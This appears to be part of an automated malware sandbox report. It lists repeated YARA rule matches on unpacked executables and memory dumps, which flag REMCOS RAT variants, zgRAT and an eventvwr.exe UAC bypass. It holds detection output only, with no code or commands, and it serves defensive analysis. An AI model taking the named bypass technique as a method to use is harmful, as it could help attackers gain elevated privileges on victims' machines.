Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
